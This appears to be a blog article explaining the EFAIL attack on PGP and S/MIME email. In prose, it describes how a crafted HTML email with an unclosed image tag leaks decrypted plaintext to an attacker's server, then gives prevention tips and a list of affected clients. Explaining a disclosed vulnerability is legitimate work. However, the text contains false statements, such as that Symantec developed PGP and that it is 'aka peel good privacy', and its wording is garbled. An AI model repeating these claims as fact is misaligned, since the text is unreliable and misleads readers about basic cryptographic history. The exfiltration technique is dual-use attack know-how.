How EFAIL attacks break down the PGP & S/MIME encryption in mails

0
243

As we all know this era belongs to the technical eavesdroppers. So,the basic sense is to protect you from them is the perfect and secured communication which can be done with the encryption and decryption methods.

In this piece we are going to see vulnerability that allows the attacker to read or decrypt the information that are sent through the mail with a highly encrypted and latest technology (no more). Well,basically what does an cryptographic communication do is encrypt your info in the cypher text which takes you so long to decrypt it manually based on the type of encryption.

In this scenario the PGP&S/MIME encryption does the same , but it enables the reading of plain text with the help of the user’s client server. Before entering in to the working of this EFAIL attacks let’s move on with some wiki info on PGP & S/MIME  encryption.

PGP– Pretty Good Privacy – aka- peel good privacy

It Is developed by the Symantec company and it still rules over than any other encryption methods. Used in almost all mail servers and can be switched (enable or disable).

S/MIME (secure/multipurpose internet mail extension)

It is an extension or add on to maintain more security in the mail servers and mostly used in corporate to keep some classified information in their firms.

Breakdown mechanism of the EFAIL attack:

The main plot here is ,to make the encrypted mails in to readable form as the plain text. so,the attackers first need to get the encrypted form to decrypt it. He will get those mails if only,he compromises the victims mail or capture the encrypted data via network traffic.

when he holds the encrypted data, he will make a snoop mail to the victim in a crafted form with the markup language (HTML) embeded with the encrypted data and a request url which belongs to the attacker. After this the client server will decrypt the mail and make it as a plain text .

This decrypted data will reach the attacker through the request url which contains an external resource (images or styles). Then this will be finally get saved in the server log of the attacker.

Understand the process of EFAIL attack:

1.First the attacker who owns a server named efail.de and holds the encrypted data will send a mail to the victim from whom he captured the encrypted form.

2. He will make the data to be embedded with the HTML code with an external image source in it.

img src : Hacker news

3. In this case the image tag is not closed at the same line , it extends up to the encrypted form to make it embedded with the html code.

 4.Finally he got the move, now he push the mail to the victim and the victim’s mail server start to decrypt it as shown below.

 5.when he receives the mail , the external image source will get loaded and the url will be requested . Through this url the attacker receives the plain text .

Prevention:

  • Experts told not to use those end to end encryptions until the encryption mechanism get updated on their own.
  • Disable the HTML view of the mails.
  • To get not compromised by the attackers keep strong passwords and enable two factor authentication.

Major firms affected by the EFAIL attack:

  • Maildroid
  • Mailapp
  • Protonmail
  • Outlook
  • Gmail
  • Post box
  • Canary mail
  • Mailfence
  • Kmail
  • Thunderbird
  • Evolution
  • Applemail
  • Mailmate
  • Airmail

LEAVE A REPLY

Please enter your comment!
Please enter your name here

This site uses Akismet to reduce spam. Learn how your comment data is processed.